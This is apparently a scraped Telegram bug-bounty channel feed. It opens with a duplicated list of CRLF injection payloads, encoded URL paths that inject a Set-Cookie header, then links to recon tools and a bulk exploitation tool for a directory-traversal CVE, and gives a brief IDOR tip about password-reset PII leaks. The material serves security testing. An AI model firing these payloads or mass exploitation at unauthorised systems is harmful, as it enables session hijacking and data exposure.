Bug Bounty Tip
CRLF Injection Attack Payload List
๐น /%%0a0aSet-Cookie:crlf
๐น /%0aSet-Cookie:crlf
๐น /%0d%0aSet-Cookie:crlf
๐น /%0dSet-Cookie:crlf
๐น /%23%0aSet-Cookie:crlf
๐น /%23%0d%0aSet-Cookie:crlf
๐น /%23%0dSet-Cookie:crlf
๐น /%25%30%61Set-Cookie:crlf
๐น /%25%30aSet-Cookie:crlf
๐น /%250aSet-Cookie:crlf
๐น /%25250aSet-Cookie:crlf
๐น /%2e%2e%2f%0d%0aSet-Cookie:crlf
๐น /%2f%2e%2e%0d%0aSet-Cookie:crlf
๐น /%2F..%0d%0aSet-Cookie:crlf
๐น /%3f%0d%0aSet-Cookie:crlf
๐น /%3f%0dSet-Cookie:crlf
๐น /%u000aSet-Cookie:crlf
๐น /%E5%98%8D%E5%98%8ASet-Cookie:crlf
#bugbounty #cybersecurity #ethicalhacking
CRLF Injection Attack Payload List
๐น /%%0a0aSet-Cookie:crlf
๐น /%0aSet-Cookie:crlf
๐น /%0d%0aSet-Cookie:crlf
๐น /%0dSet-Cookie:crlf
๐น /%23%0aSet-Cookie:crlf
๐น /%23%0d%0aSet-Cookie:crlf
๐น /%23%0dSet-Cookie:crlf
๐น /%25%30%61Set-Cookie:crlf
๐น /%25%30aSet-Cookie:crlf
๐น /%250aSet-Cookie:crlf
๐น /%25250aSet-Cookie:crlf
๐น /%2e%2e%2f%0d%0aSet-Cookie:crlf
๐น /%2f%2e%2e%0d%0aSet-Cookie:crlf
๐น /%2F..%0d%0aSet-Cookie:crlf
๐น /%3f%0d%0aSet-Cookie:crlf
๐น /%3f%0dSet-Cookie:crlf
๐น /%u000aSet-Cookie:crlf
๐น /%E5%98%8D%E5%98%8ASet-Cookie:crlf
#bugbounty #cybersecurity #ethicalhacking
โค9๐5
YouTube
How To Restore Windows boot loader After Deleting Linux and Grub loader| H4K-XTRA
So I'm back on youtube :D
In This Video i will be showing how to unistall linux and remove grub bootloader.
Restore Windows boot loader After Deleting Linux and Grub loader
Because most of the time you find that even after unistalling linux the grub bootโฆ
In This Video i will be showing how to unistall linux and remove grub bootloader.
Restore Windows boot loader After Deleting Linux and Grub loader
Because most of the time you find that even after unistalling linux the grub bootโฆ
XSS Cheatsheet Burpsuite Extension https://portswigger.net/bappstore/eb75d39684b845adb457bcb050d1aa1d
๐3
๐ InfiSCA: Your Open-Source Vulnerability Scanner
InfiSCA is an open-source software composition analysis (SCA) tool. Think of it as a security guard for your software supply chain.
๐Download :https://github.com/Infisical/infisical
InfiSCA is an open-source software composition analysis (SCA) tool. Think of it as a security guard for your software supply chain.
๐Download :
๐7โค1๐ฅ1
๐ฎJScripter - A noob-friendly JavaScript scraper based on #GAU and #hakrawler. Options to scan a single URL or multiple URLs from a list. Uses threads, saves files into a directory, and de-duplicates during saving.
โ Download-https://github.com/ifconfig-me/JScripter
#BugBounty #bugbountytips
โ Download-
#BugBounty #bugbountytips
๐ฅ8๐1
๐ Apepe - Mobile application pentesting๐
๐ต๏ธ Apepe is a Python tool developed to help pentesters and red teamers to easily get information from the target app. This tool will extract basic informations as the package name, if the app is signed and the development language...
๐งพ Source - github.com/oppsec/Apepe
๐ต๏ธ Apepe is a Python tool developed to help pentesters and red teamers to easily get information from the target app. This tool will extract basic informations as the package name, if the app is signed and the development language...
๐งพ Source - github.com/oppsec/Apepe
โค7
Do Sign Up for Top Notch Results ๐
Please open Telegram to view this post
VIEW IN TELEGRAM
Drop Your Suggestions for Resources
Please open Telegram to view this post
VIEW IN TELEGRAM
๐คฃ5๐2๐1
This media is not supported in your browser
VIEW IN TELEGRAM
BBRF-Client: The Bug Bounty Reconnaissance Framework (BBRF) can help you coordinate your reconnaissance workflows across multiple devices.
๐ https://github.com/honoki/bbrf-client/
Please open Telegram to view this post
VIEW IN TELEGRAM
๐2๐1
IDOR in Reset Password
When the user reset his password the application make an API request to make sure that username exists. If exist, it will come back with Personal Identifying Information (PII) in the response [Full name,Email,Phone number].
By:@Maakthon
#bugbountytips
When the user reset his password the application make an API request to make sure that username exists. If exist, it will come back with Personal Identifying Information (PII) in the response [Full name,Email,Phone number].
By:@Maakthon
#bugbountytips
โค11๐4
๐จ CVE-2024-40348 ๐จ
๐ This is a bulk scanning and exploitation tool for CVE-2024-40348: Bazaar v1.4.3 allows unauthenticated attackers to execute a directory traversal. This vulnerability was discovered by 4rdr.
๐ Download : https://github.com/bigb0x/CVE-2024-40348
๐ This is a bulk scanning and exploitation tool for CVE-2024-40348: Bazaar v1.4.3 allows unauthenticated attackers to execute a directory traversal. This vulnerability was discovered by 4rdr.
๐ Download : https://github.com/bigb0x/CVE-2024-40348
๐ฅ2โค1
Please open Telegram to view this post
VIEW IN TELEGRAM
Ko-fi
Buy Brut Security a Coffee
Become a supporter of Brut Security today!
โค2๐ค1
Brut Security pinned ยซ๐คฉ Hey everyone, thanks for being part of this awesome community! ๐ธ If you enjoy my content and want to support me, you can buy me a coffee on Ko-fi: https://ko-fi.com/brutxninja โ๏ธ !ยป
Please open Telegram to view this post
VIEW IN TELEGRAM
Ko-fi
A Practical Guide to Starting Your Cybersecurity Career in India
Brut Security published a post on Ko-fi
โค1